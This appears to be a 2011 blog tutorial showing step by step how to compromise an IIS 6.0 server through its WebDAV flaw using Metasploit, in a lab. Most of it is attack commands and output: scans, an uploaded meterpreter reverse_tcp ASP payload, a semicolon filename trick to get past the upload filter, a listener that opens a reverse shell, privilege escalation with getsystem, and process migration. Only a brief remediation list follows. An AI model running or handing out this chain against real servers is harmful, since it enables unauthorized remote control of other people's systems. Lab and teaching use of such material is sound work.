Sep 23, 2011

Exploiting Microsoft IIS version 6.0 webDAV with Metasploit (exploit)


BACKGROUND


According to technet.microsoft.com, Web Distributed Authoring and Versioning (WebDAV) extends the HTTP/1.1 protocol to allow clients to publish, lock, and manage resources on the Web.


Integrated into IIS, WebDAV allows clients to do the following:


• Manipulate resources in a WebDAV publishing directory on your server. For example, users who have been assigned the correct rights can copy and move files around in a WebDAV directory.

• Modify properties associated with certain resources. For example, a user can write to and retrieve a file's property information.
• Lock and unlock resources so that multiple users can read a file concurrently. However, only one person can modify the file at a time.
• Search the content and properties of files in a WebDAV directory.

VULNERABILITY


According to cve.mitre.org the WebDAV extension in Microsoft Internet Information Services (IIS) 5.1 and 6.0 allows remote attackers to bypass URI-based protection mechanisms, and list folders or read, create, or modify files, via a %c0%af (Unicode / character) at an arbitrary position in the URI, as demonstrated by inserting %c0%af into a "/protected/" initial pathname component to bypass the password protection on the protected\ folder, aka "IIS 5.1 and 6.0 WebDAV Authentication Bypass Vulnerability," a different vulnerability than CVE-2009-1122.


OPERATING SYSTEMS


The Pentesting Operating System (OS) used is for attack phase:

root@bt$ lsb_release -a


The following exploit was testing using Backtrack 5 Gnome Vmware 32-bit version. Backtrack developers use Ubuntu as you can see below:


No LSB modules are available.

Distributor ID: Ubuntu
Description: Ubuntu 10.04.2 LTS
Release: 10.04
Codename: lucid

Target OS effected:


Windows Server 2003

Windows Server 2003 R2
Windows Server 2003 with SP1

INSTRUCTIONS


First and foremost, log in to backtrack terminal as root user.


Run nmap scan against the target web server to learn about all open ports and the version of application and service version listening on each open port. Likewise, include the option [-O] to detect Operating System (OS) version.


TIP,


By default, Backtrack has NMAP installed and ready to go. However, if you decide to use a regular distribution of Ubuntu, by advised that you will also need to download and install Network Mapper (NMAP) if you don’t have it installed in your system already. Please use the following link to do so:



The command:

root@bt:/#nmap -sV -Pn -A -O -n -p 80,135,139,445,53 [target web server]


For example,


Our Windows 2003 server target IP address is: 192.168.216.156

root@bt:/#nmap -sV -Pn -A -O -n -p 80,135,139,445,53 192.168.110.156


The results of the scan are:


Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-09-18 12:48 EDT

Nmap scan report for 192.168.110.156
Host is up (0.00038s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS
80/tcp open http Microsoft IIS httpd 6.0
| http-methods: Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: UBERSEC Digital Forensics
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
MAC Address: 00:0C:29:ED:A0:96 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 2003
OS details: Microsoft Windows Server 2003 SP1 or SP2
Network Distance: 1 hop
Service Info: OS: Windows

---SNIP--- ---SNIP---


The results can indicate a variety of things. Yet, the one we are looking for is that this server is a Microsoft 2003 server with Microsoft IIS httpd web server version 6.0.


Now we can proceed to our next phase.

root@bt:/#cd /pentest/exploits/framework3


Now load msfconsole from Metasploit v4.0.1-dev

root@bt:/pentest/exploits/framework3#./msfconsole


Now wait for a minute for the module to load…


Once the console has been loaded, type the followings:

msf >use auxiliary/scanner/http/webdav_scanner
msf auxiliary(webdav_scanner) >show options
msf auxiliary(webdav_scanner) >set RHOSTS [target web server IP address]


OR

msf auxiliary(webdav_scanner) >set RHOSTS 192.168.110.156
RHOSTS => 192.168.110.156
msf auxiliary(webdav_scanner) >run


The results of the scan are:


[*] 192.168.110.156 (Microsoft-IIS/6.0) has WEBDAV ENABLED

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The results can also affirm that the target server is a Microsoft IIS Web server version 6.0 that has a WEBDAV service enabled. This is crucial to our exploit attack.


Now let’s perform one more scan:

msf auxiliary(webdav_scanner) > use auxiliary/scanner/http/dir_scanner
msf auxiliary(dir_scanner) >show options
msf auxiliary(webdav_scanner) >set RHOSTS [target web server IP address]


OR

msf auxiliary(dir_scanner) > set RHOSTS 192.168.110.156
RHOSTS => 192.168.110.156
msf auxiliary(dir_scanner) > run


The results of the scan are:


[*] Detecting error code

[*] Using code '404' as not found for 192.168.110.156
[*] Found http://192.168.110.156:80/Pages/ 403 (192.168.110.156)
[*] Found http://192.168.110.156:80/Templates/ 403 (192.168.110.156)
[*] Found http://192.168.110.156:80/ToDo/ 403 (192.168.110.156)
[*] Found http://192.168.110.156:80/_notes/ 403 (192.168.110.156)
[*] Found http://192.168.110.156:80/finance/ 200 (192.168.110.156)
[*] Found http://192.168.110.156:80/form/ 403 (192.168.110.156)
[*] Found http://192.168.110.156:80/images/ 403 (192.168.110.156)
[*] Found http://192.168.110.156:80/pages/ 403 (192.168.110.156)
[*] Found http://192.168.110.156:80/scripts/ 403 (192.168.110.156)
[*] Found http://192.168.110.156:80/templates/ 403 (192.168.110.156)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The Metasploit auxiliary web dir_scanner was able to identify quite few interesting folders with the target web server. However, the line that is the most interesting within the results is the finance folder which corresponds to error code 200. Unlike error code 403 which means that the actions was forbidden, error code 200 in the finance folder means that possibly someone could access the folder externally. Error code 200 is not a good practice without proper authentication. To learn more about error codes, please refer to the following website
http://webmaster.iu.edu/tool_guide_info/errorcodes.shtml

Now let’s browse to the website through our Internet browser by typing http://192.168.110.156:80/finance/ to see the content of the folder:


webdav_1


We can see that ubersec have some files listed for other users to download or view. Let’s go ahead and perform a test to see whether we can upload a file to the /finance folder rather than only downloading.


Now open another terminal window or tab and login as root if needed. Then type the followings.


Create a simple text file by typing:

root@bt:/#echo "You are owned." > hello.txt


Then use the cadaver (Command-Line WebDAV client for unix) tool to connect to the target server /finance folder by typing:

root@bt:/#cadaver http://192.168.110.156/finance


TIP,


If you don’t have cadaver installed on your Ubuntu or Backtrack OS, please type the following command to download that tool.

root@bt:/#apt-get install cadaver


Now put the file that you have created in the /finance folder by typing:

dav:/finance/>put hello.txt


Uploading hello.txt to `/finance/hello.txt':

Progress: [=============================>] 100.0% of 15 bytes succeeded.

Type quit to exit:

dav:/finance/> quit


Connection to `192.168.110.156' closed.


Then let’s browse to the finance folder again once again throughout Internet browser


webdav_2


And now we can see that the file that we uploaded is appearing in the folder among the other files.


Since we were successful uploading the file to the /finance folder, let’s try to exploit the server. For that purpose we will use Metasploit.


Access the Framework folder and type the followings to create our exploit as an ASP.net file:

root@bt:/pentest/exploits/framework#./msfpayload windows/meterpreter/reverse_tcp LHOST=[the local IP address or your hacking machine] LPORT=8443 R | ./msfencode -t asp -o owned.asp


OR

root@bt:/pentest/exploits/framework ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.110.129 LPORT=8443 R | ./msfencode -t asp -o owned.asp


ncode –t asp -o owned.asp

[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

Now type [ls] to list the folder and locate the file that you have created:

root@bt:/pentest/exploits/framework#ls


STOP!!


It is time for testing yourself. View the content of the file by typing:

root@bt:/pentest/exploits/framework#cat owned.asp


buf =

"\xbe\xeb\x20\xee\x30\xd9\xec\xd9\x74\x24\xf4\x58\x33\xc9" +
"\xb1\x49\x31\x70\x14\x83\xe8\xfc\x03\x70\x10\x09\xd5\x12" +
"\xd8\x44\x16\xeb\x19\x36\x9e\x0e\x28\x64\xc4\x5b\x19\xb8" +
"\x8e\x0e\x92\x33\xc2\xba\x21\x31\xcb\xcd\x82\xff\x2d\xe3" +
"\x13\xce\xf1\xaf\xd0\x51\x8e\xad\x04\xb1\xaf\x7d\x59\xb0" +
"\xe8\x60\x92\xe0\xa1\xef\x01\x14\xc5\xb2\x99\x15\x09\xb9" +
"\xa2\x6d\x2c\x7e\x56\xc7\x2f\xaf\xc7\x5c\x67\x57\x63\x3a" +
"\x58\x66\xa0\x59\xa4\x21\xcd\xa9\x5e\xb0\x07\xe0\x9f\x82" +
"\x67\xae\xa1\x2a\x6a\xaf\xe6\x8d\x95\xda\x1c\xee\x28\xdc" +

---SNIP--- ---SNIP---


If you see that type of shellcode (above) then you have done something wrong or you have missed typed something while creating that file with msfpayload & msfencode


But if you get the following code instead,


<%

Sub wfKwCynJSZoH()
fjnwXX=Chr(77)&Chr(90)&Chr(144)&Chr(0)&Chr(3)&Chr(0)&Chr(0)&Chr(0)
&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Chr(0)&Chr(0)&Chr(184)
&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&
Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)
&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&
Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(232)&Chr(0)&Chr(0)&Chr(0)&Chr(14)&
Chr(31)&Chr(186)&Chr(14)&Chr(0)&Chr(180)&Chr(9)&Chr(205)&Chr(33)&Chr(184)
&Chr(1)&Chr(76)&Chr(205)&Chr(33)&Chr(84)&Chr(104)&Chr(105)&Chr(115)&Chr
(32)&Chr(112)&Chr(114)&Chr(111)&Chr(103)&Chr(114)&Chr(97)&Chr(109)&Chr(32)
&Chr(99)&Chr(97)&Chr(110)&Chr(110)&Chr(111)&Chr(116)&Chr(32)&Chr(98)&Chr(101)

---SNIP--- ---SNIP---


You are ready to rock!


Okay, now connect back to the target WebDAV server using the cadaver command:

root@bt:/#cadaver http://192.168.110.156/finance


Since the target server doesn’t allow us to upload executable web files (such as ASP format), we have to circumvent the server. This is how we are going to do it:

dav:/finance/> put owned.asp owned.txt
Uploading owned.asp to `/finance/owned.txt':
Progress: [=============================>] 100.0% of 1388 bytes succeeded.

dav:/finance/> copy owned.txt owned.asp;.txt

Copying `/finance/owned.txt' to `/finance/owned.asp%3b.txt': succeeded.


Type quit to exit:

dav:/finance/> quit
Connection to `192.168.110.156' closed.


Now, load the msfconsole by typing:

root@bt:/pentest/exploits/framework#./msfconsole


Then type:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST [the IP of your hacking OS]
msf exploit(handler) > set LPORT [Listening port number]


OR


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.110.129
msf exploit(handler) > set LPORT 8443
LPORT => 8443


Now type show options to see your options:

msf exploit(handler) >show options


Module options (exploit/multi/handler):


Name Current Setting Required Description

---- --------------- -------- ----------- ----------------


Payload options (windows/meterpreter/reverse_tcp):


Name Current Setting Required Description

-------- --------------------- ----------- ----------------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 192.168.110.129 yes The listen address
LPORT 8443 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > set ExitOnSession false

ExitOnSession => false

Now type, exploit –j to start running the exploit:

msf exploit(handler) > exploit -j


[*] Exploit running as background job.

[*] Started reverse handler on 192.168.110.129:8443
[*] Starting the payload handler...
msf exploit(handler) >

Now browse back to the website and click on the file that you manipulated in previous step owned.asp;.txt


http://192.168.110.156/finance/owned.asp;.asp


webdav_3


The file will attempt to get loaded but nothing has happened, or did it?
:-)

Well, go back to your terminal windows right were you have type exploit –j earlier.

Now you should see the followings:

[*] Started reverse handler on 192.168.110.129:8443

[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.110.156
[*] Meterpreter session 1 opened (192.168.110.129:8443 -> 192.168.110.156:1908) at 2011-09-19 15:34:16 -0400

If that is the case, please type sessions and press [ENTER]

msf exploit(handler) >sessions


Active sessions

===========
Id Type Information Connection
-- ---- --------------- ---------------
1 meterpreter x86/win32 192.168.110.129:8443 -> 192.168.110.156:1908

You can see that Metasploit have one session that is active. So lets attempt to connect to it by typing:

msf exploit(handler) > sessions -i 1

[*] Starting interaction with 1...

Now let’s attempt to elevate permission by typing:

meterpreter >getsystem


...got system (via technique 4)


Now type [ps] to see all process running on the target web server

meterpreter >ps


webdav_4


The service that we are interested in is the explorer.exe service. The reason that we care about that service is to allow us to attempt and migrate our session to that service to avoid causing the session to crash and get terminated by the target web server.


Now type migrate and the service process ID. That will allow us to migrate to that service:

meterpreter > migrate 3464


[*] Migrating to 3464...

[*] Migration completed successfully.

Now type shell to get access to the command line on target server:

meterpreter > shell


Process 1264 created.

Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator>


Now create a test file to see if you own the web server

C:\Documents and Settings\Administrator>echo "The server has be exploited" > test.txt


echo "The server has be exploited" > test.txt


C:\Documents and Settings\Administrator>


Now go back to the web server (if you have an access to the server) and open a command line from the run line


webdav_5


You can see that you have successfully gain an access to the server and created a text file


You are done!


You can also download my PDF document for your record from the following link:



ALTERNATIVES


Alternative exploit can be downloaded from exploit-db



REMEDIATION


Please use the following link for managing WebDAV Security (IIS 6.0)




Please use the following link for implementing a secure WebDAV system



Please use the following link to download Microsoft Security tools such as:


Microsoft Security Compliance Manager

Microsoft Baseline Security Analyzer
Microsoft Security Assessment Tool


RESOURCES


Common Vulnerabilities and Exposures CVE-2009-1535



Microsoft Security Bulletin MS09-020 – Important



Installing IIS server and configuring WebDAV




HOW TO: Create and Configure Active Server Pages (ASP) Web Applications in the Windows Server 2003

 


If you like my blog, Please Donate Me

No comments: